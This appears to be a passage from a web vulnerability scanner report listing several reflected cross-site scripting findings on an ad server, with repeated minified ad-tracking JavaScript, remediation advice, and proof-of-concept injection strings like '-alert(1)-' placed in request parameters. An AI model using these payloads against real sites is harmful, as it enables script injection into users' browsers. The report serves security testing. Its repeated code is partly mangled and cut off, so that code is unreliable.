d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-30291572_1289162280","http://vulnerable.ad.partner//idgt.technewsworld/home_below;net=idgt;u=,idgt-30291572_1289162280,11c4bc59fd87e17c79d4';alert(1)//0683d2a73ec,none,;;contx=none;dc=d;btg=?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    5204623896177120256 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    5f3d9'-alert(1)-'8eac24aaf3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-92091874_1289162284","http://vulnerable.ad.partner//idgt.technewsworld/home_above?5f3d9'-alert(1)-'8eac24aaf3c=1;net=idgt;u=,idgt-92091874_1289162284,11c4bc59fd87e17,none,idgt.virtualization_l;;contx=none;dc=d;btg=idgt.virtualization_l?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); ]]> false
    3075221985568304128 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    a8f29'-alert(1)-'7ded30b947f was submitted in the sec parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var b=a.teV.getTime()-a.tsV.getTime();a.teV.setTime(b);a.tsV=null;a._vt+=Math.round(b/1000)}a._it_0()};this._it_0=function(){if(a.ts!=null){a.te=new Date();var b=a.te.getTime()-a.ts.getTime();a.te.setTime(b);a.ts=null;a._it+=Math.round(b/1000)}};this._e_ou=function(b){a._vt_0();a._log("I");a._e_scr()};this._e_b4=function(c){if(a._to!=null){window.clearInterval(a._to);a._to=null}a._vt_0();a._log("U");a.done=true;var d=new Date(),e=0,b;e=0;while(e<200){b=new Date();e=b.getTime()-d.getTime()}};this._e_cl=function(b){a._ic=a._ic+1;a._vt_0();a._log("C");a._e_scr();return true};this._e_bl=function(b){a._vt_0();a._log("B");a._e_scr()};this.checkViewTimeout=function(){if(a.tsV!=null){var b=new Date();var c=b.getTime()-a.tsV.getTime();b.setTime(c);var d=a._vt+Math.round(c/1000);if(d>=a.mxVT){a._e_b4()}else{if(d>a._vtl){a._e_bl()}}}};this.getLogData=function(b){str="tx="+a._id+";it="+(a._it)+";vt="+(a._vt)+";ic="+(a._ic)+";atf="+(a.fATF?"1":"0")+";pv="+(a.fV?"1":"0")+";fv="+(a.fFV?"1":"0")+";seq="+(a.nLg)+";et="+b+";ord="+CollectiveMedia.rand(1000000);if(!/\?$/.test(str)){str+="?"}return str};this.getLogUrl=function(b){if(b==null){b="U"}url=location.protocol+"//l.collective-media.net/log;"+a.getLogData(b);return url};this._log=function(b){if(!a.done){a.nLg++;if(a._obi){a._obi.src=a.getLogUrl(b);a._vtl=a._vt}}}}function fP(b){var c=fPX(b);var a=fPY(b);return[c,a]}function fPX(a){var b=0;if(a.offsetParent){while(1){b+=a.offsetLeft;if(!a.offsetParent){break}a=a.offsetParent}}else{if(a.x){b+=a.x}}return b}function fPY(b){var a=0;if(b.offsetParent){while(1){a+=b.offsetTop;if(!b.offsetParent){break}b=b.offsetParent}}else{if(b.y){a+=b.y}}return a}function getWS(){var a=0,b=0;if(typeof(window.innerWidth)=="number"){a=window.innerWidth;b=window.innerHeight}else{if(document.documentElement&&(document.documentElement.clientWidth||document.documentElement.clientHeight)){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else{if(document.body&&(document.body.clientWidth||document.body.clientHeight)){a=document.body.clientWidth;b=document.body.clientHeight}}}return[a,b]}function getXY(){var b=0,a=0;if(typeof(window.pageYOffset)=="number"){a=window.pageYOffset;b=window.pageXOffset}else{if(document.body&&(document.body.scrollLeft||document.body.scrollTop)){a=document.body.scrollTop;b=document.body.scrollLeft}else{if(document.documentElement&&(document.documentElement.scrollLeft||document.documentElement.scrollTop)){a=document.documentElement.scrollTop;b=document.documentElement.scrollLeft}}}return[b,a]}var CollectiveMedia={rand:function(a){return Math.floor(Math.random()*a)},appendChild:function(a,b){if(null==a.canHaveChildren||a.canHaveChildren){a.appendChild(document.createTextNode(b))}else{a.text=b}},createAndAttachAd:function(h,c,a,e,f){var g=document.getElementsByTagName("script");var b=g[g.length-1];if(b==null){return}var i=document.createElement("script");i.language="javascript";i.setAttribute("type","text/javascript");var j="document.write('');";b.parentNode.insertBefore(i,b);CollectiveMedia.appendChild(i,j);if(f){var d=new cmIV_();d._init(h,i.parentNode,a,e);return d}},addPixel:function(a){CollectiveMedia.addEvt(window,"load",function(){img=document.createElement("img");img.src=a;CollectiveMedia.appendChild(img)})},addTrackingImages:function(){CollectiveMedia.trackingImages=arguments;CollectiveMedia.addEvt(window,"load",CollectiveMedia.loadTrackingImages)},loadTrackingImages:function(){var a=CollectiveMedia.trackingImages,c="?";c+=CollectiveMedia.rand(1000000);for(var b=0;bCollectiveMedia.createAndAttachAd("idgt-20412117_1289163503","http://vulnerable.ad.partner/adj/idgt.technewsworld/home_above;net=idgt;u=,idgt-20412117_1289163503,11c4bc59fd87e17,none,idgt.virtualization_h-idgt.virtualization_l-idgt.virtualization_m;;sec=a8f29'-alert(1)-'7ded30b947f;contx=none;dc=d;btg=idgt.virtualization_h;btg=idgt.virtualization_l;btg=idgt.virtualization_m?","0","0",false);');var __cs_c1 = 8; var __cs_c2 = "6035308"; var __cs_c3 = ""; var __cs_c4 = ""; var __cs_c5 = ""; var __cs_c6 = ""; var __cs_c10 = ""; var __cs_c15 = ""; var __cs_params = ["c1=", __cs_c1, "&c2=", __cs_c2, "&c3=", __cs_c3, "&c4=", __cs_c4, "&c5=", __cs_c5, "&c6=", __cs_c6, "&c10=", __cs_c10, "&c15=", __cs_c15].join(''); document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js?" + __cs_params +"'%3E%3C/script%3E")); CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif");CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii93kdn349&reppipe=,&edr=off&repequal=_&ru=http%3A%2F%2Fa.collective-media.net%2Fdatapair%3Fnet%3Dna%26pasv%3D0%26id%3D%3Cna_id%3E%26pid%3D%3Cna_mp%3E%26segs%3D%3Cna_da%3E");]]> false
    2461226726833644544 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    4f9e4'-alert(1)-'25db0e8a29 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    2441620760859862016 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    deb76'-alert(1)-'9ce1c780221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    '); document.write(''); ]]> false
    5083304950694892544 2097920 Cross-site scripting (reflected) http://a.collective-media.net High Certain
    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.]]>
  • Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
  • User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
  • In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.]]>
    dc66f'-alert(1)-'2edc89fb87e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.]]>
    5){return null}var c=null;var b,e;for(b=d.length-1;b>=0;b--){c=d[b];e=c.nodeName;if((e=="OBJECT"||e=="IFRAME"||e=="IMG")&&c.width==a._w&&c.height==a.height){a._ob=c;break}else{if(e=="EMBED"&&((c.width==a._w&&c.height==a.height)||(c.style.width==a._w+"px"&&c.style.height==a.height+"px"))){a._ob=c;break}else{if(e=="DIV"||e=="A"){a._findUnit(c.childNodes,f);break}else{if(e=="FORM"){a._ob=c;break}}}}}return c};this.onLoad=function(){var b,c=0;a._findUnit(a.oDoc.childNodes,c);if(a._ob!==null){b=document.createElement("IMG");b.height=1;b.width=1;b.id="img"+a._id;document.body.appendChild(b);a.obj_init(a._ob);a._log("L")}};this.obj_init=function(c){this._ob=c;var b="img"+this._id;this._obi=document.getElementById(b);if(this._ob!==null){CollectiveMedia.addEvt(window,"beforeunload",this._e_b4);CollectiveMedia.addEvt(window,"blur",this._e_bl);CollectiveMedia.addEvt(window,"focus",this._e_scr);CollectiveMedia.addEvt(window,"unload",this._e_b4);CollectiveMedia.addEvt(window,"scroll",this._e_scr);CollectiveMedia.addEvt(window,"resize",this._e_scr);CollectiveMedia.addEvt(this._ob,"mouseover",this._e_in);CollectiveMedia.addEvt(this._ob,"mouseout",this._e_ou);CollectiveMedia.addEvt(this._ob,(this._ob.nodeName=="FORM"?"submit":"click"),this._e_cl);this._ps=fP(this._ob)}this._e_scr(null);this._to=window.setInterval(function(){a.checkViewTimeout()},15000)};this._e_in=function(b){if(a.ts==null){a.ts=new Date()}a._ic=a._ic+1};this._e_scr=function(c){var i,g,b,f,e,d,h=false;if(a._ob!==null&&a._ps!==null){a._ps=fP(a._ob);b=getWS();f=getXY();e=(Math.round(a._ps[1])+Math.round(a._ob.height));d=(Math.round(a._ps[0])+Math.round(a._ob.width));if((Math.round(b[1])+Math.round(f[1])>Math.round(a._ps[1]))&&(f[1]Math.round(a._ps[0]))&&(f[0]f[1]&&e<(f[1]+b[1])){i=true}if(a._ps[0]>f[0]&&d<(f[0]+b[0])){g=true}if(g&&i){if(!a.fFV){a.fFV=true;h=true}}}else{a._vt_0();if(a._vt>a._vtl){a._log("H")}}}if(h||a.nLg==0){a._log("V")}};this._vt_0=function(){if(a.tsV!=null){a.teV=new Date();var 